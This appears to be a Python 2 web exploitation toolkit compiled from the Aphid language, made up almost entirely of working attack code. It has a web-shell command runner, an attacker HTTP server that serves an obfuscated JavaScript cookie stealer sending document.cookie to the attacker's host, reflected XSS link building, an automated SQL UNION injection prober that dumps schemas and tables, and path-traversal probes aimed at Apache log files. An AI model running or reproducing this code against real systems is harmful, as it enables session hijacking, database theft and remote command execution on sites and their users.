# Compiled from Aphid to Python by Boxelder 0.5.5926.31997
# https://github.com/John-Leitch/Aphid/releases
################################################################
def var_func_00000030(___p_op_8):
    return (___p_op_8.filename)

def var_func_0000002C(___p_op_7):
    return (___p_op_7 > 1)

def var_func_0000001D(___p_op_4):
    return (___p_op_4 != "<")

def var_func_0000001C(___p_op_3):
    return (___p_op_3 != "#")

def where(predicate, list):
    x = []
    for element in list:
        if predicate(element):
            (x.append)(element)
    return x

def select(selector, list):
    x = []
    for y in list:
        (x.append)(selector(y))
    return x

def selectMany(selector, list):
    x = []
    for y in list:
        for z in selector(y):
            (x.append)(z)
    return x

def flatten(list):
    def var_func_00000000(x):
        return x

    return selectMany(var_func_00000000, list)

def any(predicate, list):
    for element in list:
        if predicate(element):
            return True
    return False

def all(predicate, list):
    for x in list:
        if not predicate(x):
            return False
    return True

def first(predicate, list):
    for x in list:
        if predicate(x):
            return x

def distinct(list):
    x = []
    for y in list:
        if not (x.__contains__)(y):
            (x.append)(y)
    return x

def iter(action, list):
    for x in list:
        action(x)

count = len
def concat(list, otherList):
    x = []
    for y in otherList:
        (x.append)(y)
    for y in list:
        (x.append)(y)
    return x

def skip(count, list):
    x = []
    i = 0
    for y in list:
        if (i >= count):
            (x.append)(y)
        i = (i + 1)
    return x

def take(count, list):
    x = []
    i = 0
    for y in list:
        if (i < count):
            (x.append)(y)
        i = (i + 1)
    return x

def aggr(acc, list):
    if (len(list) == 1):
        return list[0]
    else:
        s = list[0]
        for x in skip(1, list):
            s = acc(s, x)
        return s

def join(sep, list):
    def var_func_00000001(x, y):
        return ((x + sep) + y)

    return aggr(var_func_00000001, list)

def addAll(list):
    def var_func_00000002(x, y):
        return (x + y)

    return aggr(var_func_00000002, list)

import os.path
class File():
    @staticmethod
    def appendAllText(filename, text):
        (File.writeText)(filename, text, "a")

    @staticmethod
    def writeAllText(filename, text):
        (File.writeText)(filename, text, "w")

    @staticmethod
    def writeText(filename, text, mode):
        file = open(filename, mode)
        (file.write)(text)
        (file.close)()

    @staticmethod
    def readAllText(filename):
        file = open(filename, "r")
        r = (file.read)()
        (file.close)()
        return r

    @staticmethod
    def exists(filename):
        return ((os.path).isfile)(filename)


class CharRange():
    @staticmethod
    def __alpha(start):
        def var_func_00000003(___p_op_0):
            return (___p_op_0 + 26)

        return (lambda var_00000000:select(chr, var_00000000))(range(ord(start), var_func_00000003(ord(start))))

    @staticmethod
    def alphaLower():
        return (CharRange.__alpha)("a")

    @staticmethod
    def alphaUpper():
        return (CharRange.__alpha)("A")

    @staticmethod
    def alpha():
        return (lambda var_00000001:concat((CharRange.alphaUpper)(), var_00000001))((CharRange.alphaLower)())


import json
class JsonRepository():
    repo = None
    def __init__(self, filename):
        (self.filename) = filename
        if (self.exists)():
            (self.read)()
        else:
            (self.repo) = dict()

    def exists(self):
        return (File.exists)((self.filename))

    def read(self):
        (self.repo) = (json.loads)((File.readAllText)((self.filename)))
        if not isinstance((self.repo), dict):
            (self.repo) = dict()

    def write(self):
        (lambda var_00000002:(File.writeAllText)((self.filename), var_00000002))((json.dumps)((self.repo)))

    def add(self, key, obj):
        (self.repo)[key] = obj
        (self.write)()

    def __getitem__(self, key):
        return ((self.repo).get)(key)

    def __setitem__(self, key, value):
        (self.repo)[key] = value


class ExploitComponent():
    def log(self, message):
        print(message)


import string
class HttpRequestTemplate():
    encode = True
    def __init__(self, url, query = None, post = None, file = None):
        (self.url) = url
        (self.query) = query
        (self.post) = post
        (self.file) = file

    def getUrl(self, values):
        s = ((((string.Template)((self.url)).substitute)(values)) if ((((self.url) != None) and (values != None))) else ((((self.url)) if (((self.url) != None)) else (""))))
        return ((((s + "?") + (self.getQuery)(values))) if ((self.hasQuery)()) else (s))

    def hasQuery(self):
        return (((self.query) != None) and (len((self.query)) != 0))

    def getQuery(self, values):
        return (self.__getData)((self.query), values)

    def getPost(self, values):
        return (self.__getData)((self.post), values)

    def getFile(self, values):
        def var_func_00000004(x):
            return HttpFile(((((string.Template)((x.name)).substitute)(values)) if ((((x.name) != None) and (values != None))) else ((((x.name)) if (((x.name) != None)) else ("")))), ((((string.Template)((x.filename)).substitute)(values)) if ((((x.filename) != None) and (values != None))) else ((((x.filename)) if (((x.filename) != None)) else ("")))), ((((string.Template)((x.data)).substitute)(values)) if ((((x.data) != None) and (values != None))) else ((((x.data)) if (((x.data) != None)) else ("")))), ((((string.Template)((x.type)).substitute)(values)) if ((((x.type) != None) and (values != None))) else ((((x.type)) if (((x.type) != None)) else ("")))))

        return ((None) if (((self.file) == None)) else ((lambda var_00000003:select(var_func_00000004, var_00000003))((self.file))))

    def __getData(self, data, values):
        if (data == None):
            return None
        result = dict()
        for k in data:
            result[((((string.Template)(k).substitute)(values)) if (((k != None) and (values != None))) else (((k) if ((k != None)) else (""))))] = ((((string.Template)(data[k]).substitute)(values)) if (((data[k] != None) and (values != None))) else (((data[k]) if ((data[k] != None)) else (""))))
        return (((urllib.urlencode)(result)) if ((self.encode)) else (result))


class HttpFile():
    def __init__(self, name, filename, data, type = "text/plain"):
        (self.name) = name
        (self.filename) = filename
        (self.data) = data
        (self.type) = type


import urllib2
from urllib import addinfourl
from urllib2 import HTTPRedirectHandler
class RedirectHandler(HTTPRedirectHandler):
    def http_error_302(self, req, fp, code, msg, headers):
        x = addinfourl(fp, headers, (req.get_full_url)())
        (x.status) = code
        (x.code) = code
        return x

    http_error_300 = http_error_302
    http_error_301 = http_error_302
    http_error_303 = http_error_302
    http_error_307 = http_error_302

(urllib2.install_opener)((urllib2.build_opener)(RedirectHandler()))
from random import choice
class MultipartFormData():
    dispositionPrefix = "Content-Disposition: form-data; "
    typePrefix = "Content-Type: "
    multiPartPrefix = "multipart/form-data; boundary="
    def __init__(self):
        (self.boundary) = (self.createBoundary)()
        (self.data) = ""

    def createBoundary(self):
        def var_func_00000005(x):
            return choice((CharRange.alpha)())

        return (lambda var_00000004:join("", var_00000004))((lambda var_00000005:select(var_func_00000005, var_00000005))(range(0, 64)))

    def getBoundary(self, final = False):
        return ((("--" + (self.boundary)) + (("--") if (final) else (""))) + "\r\n")

    def addBoundary(self, final = False):
        (self.data) += (self.getBoundary)(final)

    def addDisposition(self, name, filename = None):
        (self.data) += (((self.dispositionPrefix) + ((("name=\"{}\"".format)(name)) if ((filename == None)) else (("name=\"{}\"; filename=\"{}\"".format)(name, filename)))) + "\r\n")

    def addType(self, type):
        (self.data) += (((self.typePrefix) + type) + "\r\n")

    def addLine(self, value = None):
        (self.data) += (((value) if ((value != None)) else ("")) + "\r\n")

    def addData(self, name, data):
        (self.addBoundary)()
        (self.addDisposition)(name)
        (self.addLine)()
        (self.addLine)(data)

    def addFileData(self, name, filename, type, data):
        (self.addBoundary)()
        (self.addDisposition)(name, filename)
        (self.addType)(type)
        (self.addLine)()
        (self.addLine)(data)

    def getContentType(self):
        return ((self.multiPartPrefix) + (self.boundary))

    def __str__(self):
        return ((self.data) + (self.getBoundary)(final = True))


from urlparse import parse_qs
class Http(ExploitComponent):
    contentType = "Content-Type"
    contentLength = "Content-Length"
    dataName = "name"
    dataFilename = "filename"
    dataType = "type"
    data = "data"
    @staticmethod
    def request(url, postData = None, fileData = None):
        print(("[?] %s" % url))
        if (postData != None):
            print(("    " + str(postData)))
        def var_func_00000006(x):
            return ("{{ {}, {}, {} }}".format)((x.name), (x.filename), (x.type))

        if (fileData != None):
            tup = (lambda var_00000006:join(", ", var_00000006))((lambda var_00000007:select(var_func_00000006, var_00000007))(fileData))
            print(("    " + tup))
        if (fileData == None):
            return ((urllib2.urlopen)(url, postData).read)()
        else:
            formData = (Http.createFormData)(postData, fileData)
            body = str(formData)
            req = (urllib2.Request)(url)
            (req.add_header)((Http.contentType), (formData.getContentType)())
            (req.add_header)((Http.contentLength), str(len(body)))
            (req.add_data)(body)
            return ((urllib2.urlopen)(req).read)()

    @staticmethod
    def createFormData(postData = None, fileData = None):
        formData = MultipartFormData()
        if (postData != None):
            postValues = parse_qs(postData)
            for k in (postValues.keys)():
                for v in postValues[k]:
                    (formData.addData)(k, v)
        if (fileData != None):
            for f in fileData:
                (formData.addFileData)((f.name), (f.filename), (f.type), (f.data))
        return formData


class Payload():
    def __init__(self, value):
        (self.value) = value

    def inject(self, target):
        return (((target % (self.value))) if ((target.__contains__)("%s")) else (target))

    def injectData(self, target):
        if (target == None):
            return None
        data = dict()
        for k in target:
            v = target[k]
            data[(self.inject)(k)] = (self.inject)(v)
        return data


class Injection():
    def __init__(self, begin, end, nextExpression):
        (self.begin) = begin
        (self.end) = end
        (self.nextExpression) = nextExpression

    def __str__(self):
        return (((self.begin) + (self.nextExpression)()) + (self.end))


from random import randint
class Shell(ExploitComponent):
    def __init__(self, createUrl, createPost = None):
        (self.createUrl) = createUrl
        (self.createPost) = createPost

    def run(self, cmd):
        u = (self.createUrl)(cmd)
        p = (((self.createPost)(cmd)) if (((self.createPost) != None)) else (None))
        resp = (Http.request)(u, p)
        return resp

    @staticmethod
    def get(url):
        def var_func_00000007(cmd):
            return ((url + "?") + (urllib.urlencode)({"cmd": cmd}))

        return Shell(var_func_00000007)

    @staticmethod
    def post(url):
        def var_func_00000008(cmd):
            return url

        def var_func_00000009(cmd):
            return (urllib.urlencode)({"cmd": cmd})

        return Shell(var_func_00000008, var_func_00000009)

    @staticmethod
    def open(url):
        print("[i] Detecting shell input")
        probe = str(randint(268435456, 4294967295))
        probeCmd = ("echo %s" % probe)
        for f in [(Shell.post), (Shell.get)]:
            shell = f(url)
            result = (shell.run)(probeCmd)
            if (result.__contains__)(probe):
                print("[+] Shell input found")
                return shell
        print("[x] Could not find shell input")
        return None


class ExploitEncoding():
    key = [60, 159, 224, 114, 159, 230, 216, 94, 23, 190, 168, 12, 209, 198, 188, 191, 168, 255, 194, 242, 72, 124, 255, 231, 185, 153, 101, 80, 37, 111, 29, 106, 235, 199, 163, 78, 229, 209, 45, 102, 0, 23, 6, 208, 65, 8, 227, 181, 197, 44, 228, 1, 121, 189, 83, 192, 159, 248, 184, 5, 129, 136, 57, 167, 160, 62, 33, 9, 35, 109, 218, 214, 210, 92, 242, 49, 117, 47, 166, 177, 182, 175, 139, 248, 139, 27, 241, 46, 116, 226, 175, 237, 25, 39, 228, 120, 222, 94, 48, 3, 231, 217, 146, 88, 82, 13, 46, 28, 202, 34, 74, 112, 82, 7, 78, 209, 252, 64, 28, 132, 77, 242, 149, 64, 189, 236, 189, 170, 119, 122, 83, 23, 255, 162, 201, 221, 29, 51, 165, 125, 237, 212, 100, 81, 151, 63, 155, 17, 216, 19, 123, 157, 66, 171, 182, 245, 67, 81, 154, 102, 79, 131, 165, 80, 207, 51, 113, 175, 62, 113, 180, 201, 154, 158, 151, 120, 142, 67, 168, 126, 81, 172, 210, 100, 254, 181, 213, 83, 236, 212, 153, 203, 152, 63, 46, 105, 46, 19, 130, 100, 206, 235, 211, 103, 94, 178, 2, 163, 19, 61, 103, 0, 169, 28, 20, 163, 177, 65, 82, 25, 94, 29, 195, 105, 216, 233, 48, 91, 112, 45, 73, 122, 192, 68, 175, 101, 217, 106, 5, 76, 179, 49, 64, 174, 109, 153, 33, 124, 43, 138, 183, 237, 193, 105, 5, 177, 39, 105, 143, 116, 130, 167, 51, 229, 244, 236, 63, 100, 109, 174, 202, 71, 59, 5, 101, 44, 220, 21, 252, 63, 199, 180, 48, 229, 117, 92, 185, 87, 62, 254, 61, 111, 219, 144, 201, 12, 254, 90, 185, 128, 89, 189, 15, 124, 192, 112, 177, 187, 3, 216, 212, 18, 108, 80, 173, 206, 119, 77, 111, 151, 50, 231, 37, 110, 113, 90, 107, 170, 60, 89, 46, 130, 91, 123, 229, 10, 164, 180, 37, 5, 170, 253, 84, 102, 41, 43, 3, 138, 227, 251, 148, 177, 234, 34, 77, 114, 151, 160, 10, 102, 4, 7, 127, 169, 170, 82, 182, 240, 106, 162, 41, 195, 40, 106, 237, 53, 147, 191, 69, 69, 87, 224, 199, 64, 197, 125, 151, 57, 45, 115, 114, 4, 169, 191, 0, 163, 126, 170, 188, 215, 116, 18, 32, 64, 210, 209, 136, 128, 52, 24, 222, 216, 91, 196, 14, 35, 64, 62, 228, 44, 187, 125, 194, 247, 48, 36, 25, 105, 106, 73, 182, 233, 3, 109, 209, 68, 192, 134, 110, 243, 244, 22, 4, 21, 148, 154, 169, 228, 176, 220, 99, 63, 197, 143, 28, 246, 79, 40, 16, 173, 183, 31, 22, 235, 98, 245, 212, 237, 243, 202, 99, 185, 208, 241, 56, 164, 121, 173, 98, 149, 123, 53, 184, 141, 230, 119, 35, 115, 81, 218, 244, 152, 117, 193, 59, 212, 0, 25, 178, 159, 197, 187, 240, 230, 121, 169, 111, 212, 86, 119, 125, 161]
    @staticmethod
    def decode(value):
        i = 0
        decoded = ""
        for x in value:
            decoded += chr((ord(x) ^ (ExploitEncoding.key)[i]))
            i = (i + 1)
            if (i == len((ExploitEncoding.key))):
                i = 0
        return decoded


from urlparse import urlparse, parse_qs
from BaseHTTPServer import BaseHTTPRequestHandler
class ExploitRequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        uri = urlparse((self.path))
        rsrc = (self.getFile)((uri.path))
        query = parse_qs((uri.query))
        print(("[i] Path: %s" % (self.path)))
        print(("[i] Resource: %s" % rsrc))
        print(("[i] Referer: %s" % (self.getReferer)()))
        print(("[i] IP: {}:{}".format)((self.getIP)(), (self.getPort)()))
        hasContent = ((rsrc != None) and (rsrc != ""))
        if ((query != None) and (query != "")):
            (self.handleQuery)()
        else:
            if hasContent:
                (self.handleResource)()
        code = ((200) if ((((uri.query) != "") or hasContent)) else (404))
        (self.send_response)(code)
        (self.send_header)("Access-Control-Allow-Origin", "*")
        (self.end_headers)()
        if hasContent:
            ((self.wfile).write)(rsrc)
        print("")

    def log_message(self, a = None, b = None, c = None, d = None, e = None, f = None, g = None, h = None, i = None, j = None, k = None, l = None, m = None, n = None, o = None, p = None):
        0

    def handleQuery(self):
        print(("[i] Message: %s" % (self.getMsg)()))

    def handleResource(self, rsrc):
        (self.send_header)("Content-type", "text/javascript")

    def getIP(self):
        return (self.client_address)[0]

    def getPort(self):
        return (self.client_address)[1]

    def getUrl(self):
        return urlparse((self.path))

    def getQuery(self):
        return parse_qs(((self.getUrl)().query))

    def getMsg(self):
        q = (self.getQuery)()
        keys = (q.keys)()
        return (((ExploitEncoding.decode)(q[keys[0]][0])) if ((len(keys) != 0)) else (None))

    def getReferer(self):
        def var_func_0000000A(r):
            return ((r[0]) if ((len(r) != 0)) else (None))

        return var_func_0000000A(((self.headers).getheaders)("referer"))

    def getFile(self, path):
        if (len(path) == 0):
            return None
        name = path[1:]
        text = (((self.server).payloads).get)(name)
        return text


class ExploitResource():
    @staticmethod
    def getScriptTag(host, port, name):
        return ("<script src=\"http://{}{}/{}\" type=\"text/javascript\"></script>".format)(host, (((":" + str(port))) if (((port != None) and (port != ""))) else ("")), name)

    @staticmethod
    def getJsCookieStealer(host, port):
        return (("\r\n        // Todo: generate key and store in repo\r\n        var key = [0x3C,0x9F,0xE0,0x72,0x9F,0xE6,0xD8,0x5E,0x17,0xBE,0xA8,0x0C,0xD1,0xC6,0xBC,0xBF,0xA8,0xFF,0xC2,0xF2,0x48,0x7C,0xFF,0xE7,0xB9,0x99,0x65,0x50,0x25,0x6F,0x1D,0x6A,0xEB,0xC7,0xA3,0x4E,0xE5,0xD1,0x2D,0x66,0x00,0x17,0x06,0xD0,0x41,0x08,0xE3,0xB5,0xC5,0x2C,0xE4,0x01,0x79,0xBD,0x53,0xC0,0x9F,0xF8,0xB8,0x05,0x81,0x88,0x39,0xA7,0xA0,0x3E,0x21,0x09,0x23,0x6D,0xDA,0xD6,0xD2,0x5C,0xF2,0x31,0x75,0x2F,0xA6,0xB1,0xB6,0xAF,0x8B,0xF8,0x8B,0x1B,0xF1,0x2E,0x74,0xE2,0xAF,0xED,0x19,0x27,0xE4,0x78,0xDE,0x5E,0x30,0x03,0xE7,0xD9,0x92,0x58,0x52,0x0D,0x2E,0x1C,0xCA,0x22,0x4A,0x70,0x52,0x07,0x4E,0xD1,0xFC,0x40,0x1C,0x84,0x4D,0xF2,0x95,0x40,0xBD,0xEC,0xBD,0xAA,0x77,0x7A,0x53,0x17,0xFF,0xA2,0xC9,0xDD,0x1D,0x33,0xA5,0x7D,0xED,0xD4,0x64,0x51,0x97,0x3F,0x9B,0x11,0xD8,0x13,0x7B,0x9D,0x42,0xAB,0xB6,0xF5,0x43,0x51,0x9A,0x66,0x4F,0x83,0xA5,0x50,0xCF,0x33,0x71,0xAF,0x3E,0x71,0xB4,0xC9,0x9A,0x9E,0x97,0x78,0x8E,0x43,0xA8,0x7E,0x51,0xAC,0xD2,0x64,0xFE,0xB5,0xD5,0x53,0xEC,0xD4,0x99,0xCB,0x98,0x3F,0x2E,0x69,0x2E,0x13,0x82,0x64,0xCE,0xEB,0xD3,0x67,0x5E,0xB2,0x02,0xA3,0x13,0x3D,0x67,0x00,0xA9,0x1C,0x14,0xA3,0xB1,0x41,0x52,0x19,0x5E,0x1D,0xC3,0x69,0xD8,0xE9,0x30,0x5B,0x70,0x2D,0x49,0x7A,0xC0,0x44,0xAF,0x65,0xD9,0x6A,0x05,0x4C,0xB3,0x31,0x40,0xAE,0x6D,0x99,0x21,0x7C,0x2B,0x8A,0xB7,0xED,0xC1,0x69,0x05,0xB1,0x27,0x69,0x8F,0x74,0x82,0xA7,0x33,0xE5,0xF4,0xEC,0x3F,0x64,0x6D,0xAE,0xCA,0x47,0x3B,0x05,0x65,0x2C,0xDC,0x15,0xFC,0x3F,0xC7,0xB4,0x30,0xE5,0x75,0x5C,0xB9,0x57,0x3E,0xFE,0x3D,0x6F,0xDB,0x90,0xC9,0x0C,0xFE,0x5A,0xB9,0x80,0x59,0xBD,0x0F,0x7C,0xC0,0x70,0xB1,0xBB,0x03,0xD8,0xD4,0x12,0x6C,0x50,0xAD,0xCE,0x77,0x4D,0x6F,0x97,0x32,0xE7,0x25,0x6E,0x71,0x5A,0x6B,0xAA,0x3C,0x59,0x2E,0x82,0x5B,0x7B,0xE5,0x0A,0xA4,0xB4,0x25,0x05,0xAA,0xFD,0x54,0x66,0x29,0x2B,0x03,0x8A,0xE3,0xFB,0x94,0xB1,0xEA,0x22,0x4D,0x72,0x97,0xA0,0x0A,0x66,0x04,0x07,0x7F,0xA9,0xAA,0x52,0xB6,0xF0,0x6A,0xA2,0x29,0xC3,0x28,0x6A,0xED,0x35,0x93,0xBF,0x45,0x45,0x57,0xE0,0xC7,0x40,0xC5,0x7D,0x97,0x39,0x2D,0x73,0x72,0x04,0xA9,0xBF,0x00,0xA3,0x7E,0xAA,0xBC,0xD7,0x74,0x12,0x20,0x40,0xD2,0xD1,0x88,0x80,0x34,0x18,0xDE,0xD8,0x5B,0xC4,0x0E,0x23,0x40,0x3E,0xE4,0x2C,0xBB,0x7D,0xC2,0xF7,0x30,0x24,0x19,0x69,0x6A,0x49,0xB6,0xE9,0x03,0x6D,0xD1,0x44,0xC0,0x86,0x6E,0xF3,0xF4,0x16,0x04,0x15,0x94,0x9A,0xA9,0xE4,0xB0,0xDC,0x63,0x3F,0xC5,0x8F,0x1C,0xF6,0x4F,0x28,0x10,0xAD,0xB7,0x1F,0x16,0xEB,0x62,0xF5,0xD4,0xED,0xF3,0xCA,0x63,0xB9,0xD0,0xF1,0x38,0xA4,0x79,0xAD,0x62,0x95,0x7B,0x35,0xB8,0x8D,0xE6,0x77,0x23,0x73,0x51,0xDA,0xF4,0x98,0x75,0xC1,0x3B,0xD4,0x00,0x19,0xB2,0x9F,0xC5,0xBB,0xF0,0xE6,0x79,0xA9,0x6F,0xD4,0x56,0x77,0x7D,0xA1];\r\n        \r\n        var alphaNum = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\";\r\n        var nextInt = function(max) { return Math.floor(Math.random() * max); };\r\n        var nextChar = function() { return alphaNum[nextInt(alphaNum.length)]; };\r\n        \r\n        var nextName = function() {\r\n            var len = nextInt(0x10);\r\n            var name = \"\";\r\n            for (var i = 0; i < len; i++) name += nextChar();\r\n            \r\n            return name;\r\n        };\r\n        \r\n        var applyKey = function(value, key, apply) {\r\n            var keyIndex = 0;\r\n            var applied = \"\";\r\n            \r\n            for (var i = 0; i < value.length; i++) {\r\n                applied += apply(value.charCodeAt(i), key[keyIndex]);\r\n                if (++keyIndex == key.length) keyIndex = 0;\r\n            }\r\n            \r\n            return applied;\r\n        };\r\n        \r\n        var encode = function(value, key) {\r\n            return applyKey(value, key, function(v, k) {\r\n                return String.fromCharCode(v ^ k);\r\n            });            \r\n        };\r\n    \r\n        var xhr = window.XMLHttpRequest ? \r\n            new XMLHttpRequest() : \r\n            new ActiveXObject(\"Microsoft.XMLHTTP\");\r\n            \r\n        var sendValue = function(v) {\r\n            var k = nextName();\r\n            var qs = k + \"=\" + escape(encode(v, key));\r\n            xhr.open(\"GET\", \"http://{host}:{port}/?\" + qs, true);\r\n            xhr.onreadystatechange = function (e) {\r\n                if (xhr.readyState == 4 && xhr.status != 200) {\r\n                    console.log(xhr.statusText);\r\n                }\r\n            }; \r\n            xhr.send();            \r\n        };\r\n        \r\n        try {\r\n            sendValue(\"Cookie => \" + document.cookie);\r\n        } catch (err) { alert(err); }\r\n    ".replace)("{host}", host).replace)("{port}", str(port))


from random import randint, choice
from BaseHTTPServer import HTTPServer
class ExploitServerConfig():
    portKey = "port"
    cookieStealerKey = "cookieStealer"
    alpha = (CharRange.alpha)()
    serverRepo = JsonRepository("server.json")
    @staticmethod
    def nextPort():
        return randint(49152, 65535)

    @staticmethod
    def nextName():
        def var_func_0000000B(x):
            return choice((ExploitServerConfig.alpha))

        return (lambda var_00000008:join("", var_00000008))((lambda var_00000009:select(var_func_0000000B, var_00000009))(range(0, randint(4, 16))))

    @staticmethod
    def getPort():
        def var_func_0000000C():
            return (ExploitServerConfig.serverRepo)[(ExploitServerConfig.portKey)]

        return (ExploitServerConfig.getValue)(var_func_0000000C)

    @staticmethod
    def getCookieStealer():
        def var_func_0000000D():
            return (ExploitServerConfig.serverRepo)[(ExploitServerConfig.cookieStealerKey)]

        return (ExploitServerConfig.getValue)(var_func_0000000D)

    @staticmethod
    def getValue(f):
        (ExploitServerConfig.ensure)()
        return f()

    @staticmethod
    def ensure():
        if ((ExploitServerConfig.serverRepo)[(ExploitServerConfig.portKey)] == None):
            (ExploitServerConfig.generate)()

    @staticmethod
    def generate():
        (ExploitServerConfig.serverRepo)[(ExploitServerConfig.portKey)] = (ExploitServerConfig.nextPort)()
        (ExploitServerConfig.serverRepo)[(ExploitServerConfig.cookieStealerKey)] = (ExploitServerConfig.nextName)()
        ((ExploitServerConfig.serverRepo).write)()


class XssExploit():
    def __init__(self, server, tmpl):
        (self.server) = server
        (self.tmpl) = tmpl

    def __str__(self):
        if (((tmpl.post) != None) and (len((tmpl.post)) > 0)):
            print("[X] POST XSS not yet supported")
            quit()
        return (tmpl.getUrl)({"xss": ((self.server).scriptTag)})


class ExploitServer(ExploitComponent):
    port = (ExploitServerConfig.getPort)()
    cookieStealer = (ExploitServerConfig.getCookieStealer)()
    def __init__(self, ip):
        (self.ip) = ip
        endpoint = (self.ip), (self.port)
        (self.server) = HTTPServer(endpoint, ExploitRequestHandler)
        ((self.server).payloads) = dict()
        ((self.server).payloads)[(self.cookieStealer)] = (ExploitResource.getJsCookieStealer)((self.ip), (self.port))
        (self.scriptTag) = (ExploitResource.getScriptTag)((self.ip), (self.port), (self.cookieStealer))

    def createExploit(self, tmpl):
        return str(XssExploit(self, tmpl))

    def serveForever(self):
        (self.log)(("[?] Listening on {}:{}".format)((self.ip), (self.port)))
        ((self.server).serve_forever)()


class SqlEmitter():
    alpha = (CharRange.alpha)()
    def getChars(self):
        def var_func_0000000E(___p_op_1):
            return (___p_op_1 != (self.quote)())

        return (lambda var_0000000A:select(chr, var_0000000A))((lambda var_0000000B:where(var_func_0000000E, var_0000000B))(range(32, 128)))

    def tup(self, vals):
        def var_func_0000000F(x, y):
            return (((x + ",") + (self.space)()) + y)

        return (lambda var_0000000C:aggr(var_func_0000000F, var_0000000C))(vals)

    def words(self, words):
        def var_func_00000010(x, y):
            return ((x + (self.space)()) + y)

        return (lambda var_0000000D:aggr(var_func_00000010, var_0000000D))(words)

    def space(self):
        return " "

    def quote(self):
        return "'"

    def junkCharRange(self):
        def var_func_00000011(x):
            return choice((self.alpha))

        return (lambda var_0000000E:join("", var_0000000E))((lambda var_0000000F:select(var_func_00000011, var_0000000F))((lambda var_00000010:range(0, var_00000010))(randint(8, 32))))

    def junkString(self):
        return ("{1}{0}{1}".format)((self.junkCharRange)(), (self.quote)())

    def unionAll(self, cols):
        return (self.words)(["UNION", "SELECT", "ALL", (self.tup)(cols)])

    def comment(self):
        return "#"


class SqlUnionOutputInfo():
    def __init__(self, begin, end, columnCount, columnNumber):
        (self.begin) = begin
        (self.end) = end
        (self.columnCount) = columnCount
        (self.columnNumber) = columnNumber


class SqlUnionProbe(ExploitComponent):
    emitter = SqlEmitter()
    output = None
    begins = ["'", "\"", "-1 ", "0 ", ""]
    ends = ["#", "--", ""]
    def __init__(self, httpTemplate, maxColumns = 32):
        (self.httpTemplate) = httpTemplate
        (self.maxColumns) = maxColumns

    def findOutput(self):
        (self.emitter) = SqlEmitter()
        columns = 0
        (self.log)("[?] Searching for union count and output")
        def var_func_00000012(x):
            return ((self.emitter).junkString)()

        def var_func_00000013(x):
            return ((x.lstrip)(quote).rstrip)(quote)

        def var_func_00000014(___p_op_2):
            return (___p_op_2 != 0)

        while True:
            columns = (columns + 1)
            for begin in (self.begins):
                for end in (self.ends):
                    cols = (lambda var_00000011:select(var_func_00000012, var_00000011))(range(0, columns))
                    quote = cols[0][0]
                    colVals = (lambda var_00000012:select(var_func_00000013, var_00000012))(cols)
                    resp = (self.sendRequest)((self.createInjection)(begin, end, cols))
                    matches = (lambda var_00000013:where((resp.__contains__), var_00000013))(colVals)
                    if var_func_00000014(len(matches)):
                        offset = (colVals.index)(matches[0])
                        msg = ("\r\n[+] Output found: Columns={}, Offset={}\r\n".format)(columns, offset)
                        (self.log)(msg)
                        return SqlUnionOutputInfo(begin, end, columns, offset)
            if (columns >= (self.maxColumns)):
                return None

    def inject(self, columns, table, where = None):
        def hasOutput():
            return ((self.output) != None)

        if not hasOutput():
            (self.output) = (self.findOutput)()
        if not hasOutput():
            (self.log)("[X] Could not find output for injection\r\n")
            return None
        injector = SqlUnionInjector({"HOST": "localhost", "PORT": 80}, ((self.output).columnCount), ((self.output).columnNumber), columns, table, delimiter = ((self.output).begin), where = where, terminator = ((self.output).end))
        (injector.payload) = (injector.dump)
        resp = (self.sendRequest)((injector.str)())
        return (injector.finalize)(resp)

    def parseSchema(self, schemas):
        if (schemas == None):
            return None
        def var_func_00000015(x):
            return x[0]

        d = distinct((lambda var_00000014:select(var_func_00000015, var_00000014))(schemas))
        dbs = dict()
        def var_func_00000016(y):
            return y[1]

        def var_func_00000017(y):
            return (x == y[0])

        for x in d:
            dbs[x] = (lambda var_00000015:select(var_func_00000016, var_00000015))((lambda var_00000016:where(var_func_00000017, var_00000016))(schemas))
        return dbs

    def listSchemas(self):
        return (self.parseSchema)((self.inject)(["TABLE_SCHEMA", "TABLE_NAME"], "INFORMATION_SCHEMA.Tables"))

    def listColumns(self, schema, table):
        (self.log)("[?] Querying information schema for column names")
        whereTmpl = (" WHERE INFORMATION_SCHEMA.COLUMNS.TABLE_SCHEMA = '{0}' AND" + " INFORMATION_SCHEMA.COLUMNS.TABLE_NAME='{1}'")
        cols = (self.inject)(["COLUMN_NAME"], "INFORMATION_SCHEMA.COLUMNS", where = (whereTmpl.format)(schema, table))
        if (cols == None):
            (self.log)("[X] Could not query information schema\r\n")
            return None
        def var_func_00000018(x):
            return x[0]

        cols = (lambda var_00000017:select(var_func_00000018, var_00000017))(cols)
        def var_func_00000019(x):
            return (("[" + x) + "]")

        tup = (lambda var_00000018:join(", ", var_00000018))((lambda var_00000019:select(var_func_00000019, var_00000019))(cols))
        (self.log)(("\r\n[+] Columns found: %s\r\n" % tup))
        return cols

    def dumpTable(self, table, schema = None, columns = None):
        return (self.inject)((((self.listColumns)(schema, table)) if ((schema != None)) else (columns)), table)

    def sendRequest(self, injection):
        values = {"sqli": injection}
        return (Http.request)(((self.httpTemplate).getUrl)(values), ((self.httpTemplate).getPost)(values))

    def createInjection(self, begin, end, cols):
        def var_func_0000001A():
            return ((self.emitter).unionAll)(cols)

        return Injection(begin, end, var_func_0000001A)


class TraversalRange(ExploitComponent):
    def __init__(self, files, start, stop, dot = ".", separator = "/", terminator = ""):
        (self.files) = files
        (self.start) = start
        (self.stop) = stop
        (self.dot) = dot
        (self.separator) = separator
        (self.terminator) = terminator
        (self.file_index) = 0
        (self.i) = start

    def next(self):
        if ((self.i) < (self.stop)):
            i = (self.i)
            f = (self.file_index)
            (self.file_index) = ((self.file_index) + 1)
            if ((self.file_index) == len((self.files))):
                (self.file_index) = 0
                (self.i) = ((self.i) + 1)
            return (self.getTravSeq)(i, f)
        else:
            raise StopIteration

    def getTravSeq(self, len, file_index):
        p = (lambda var_0000001A:join((self.separator), var_0000001A))((self.files)[file_index])
        return ((((((self.dot) * 2) + (self.separator)) * len) + p) + (self.terminator))

    def __iter__(self):
        return self


class TraversalProbe(ExploitComponent):
    dirs = [["apache", "logs"], ["apache2", "logs"], ["etc", "httpd", "logs"], ["opt", "lampp", "logs"], ["usr", "local", "apache", "logs"], ["var", "log"], ["var", "log", "apache"], ["var", "log", "apache2"], ["var", "log", "httpd"], ["var", "www", "logs"], ["xampp", "apache", "logs"]]
    names = ["access.log", "access_log", "acces.log", "acces_log", "error.log", "error_log"]
